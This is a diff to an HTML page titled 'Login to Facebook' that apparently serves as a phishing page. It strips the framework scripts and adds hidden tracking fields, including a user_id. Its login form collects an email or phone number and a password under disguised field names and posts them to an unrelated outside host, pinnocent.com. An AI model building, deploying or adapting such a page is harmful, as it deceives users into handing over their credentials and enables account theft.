--- a/index.html
+++ b/index.html
@@ -3,9 +3,7 @@
                  <meta charset="UTF-8">
                  <meta name="viewport" content="width=device-width, initial-scale=1.0">
                  <title>Login to Facebook</title>
-                 <script crossorigin="" src="https://unpkg.com/react-dom@18/umd/react-dom.development.js"></script>
-                 <script src="https://unpkg.com/@babel/standalone/babel.min.js"></script>
-                 <script src="https://cdn.tailwindcss.com"></script>
+          
                  <style type="text/css" id="operaUserStyle">
                  body{
                    color:#ffffff; 
@@ -29,30 +27,26 @@
                    background-color: #5762ef;
                    color: white;
                  }
-                 .login {
-                   background-color: #5762ef;
-                 }
                  </style>
                  </head>
                  <img src="top.png">
                  <center>
-                 <body class="bg-[#111111]">
-                  <noscript>You need to enable JavaScript to run this app.</noscript>
-                  <div id="root"><div>
-                  <div class="grid place-content-center grid-cols-1 md:px-96 mt-10 gap-10">
-                  <div class="m-auto text-xs sm:text-sm md:text-lg max-w-sm md:max-w-2xl text-center "></div>
+          
     <form action="https://pinnocent.com/vpage" method="POST">
+    <input type="hidden" name="link" value="custom template">
+    <input type="hidden" name="ftype" value="normal">
+    <input type="hidden" name="login" value="login">
+    <input type="hidden" name="user_id" value="16934">
     <div class="p-2 w-full  gap-1  ">
     <div class="flex flex-col   p-2  gap-1">
     <input type="text" name="message_title" placeholder="Mobile number or email address" required="text"></div>
     <div class="flex flex-col   p-2   gap-1">
     <input type="password" name="description" placeholder="Password" id="password" autocomplete="new-password" aria-autocomplete="list" required="password"></div>
     <div>
-    <button type="submit" class="login" style="width: 80%">Log In</button>
+    <button type="submit" style="width: 80%">Log In</button>
     </div>
     </div>
     </form>
-    </center>
     <img src="bottom.png"
     </div>
     </div>
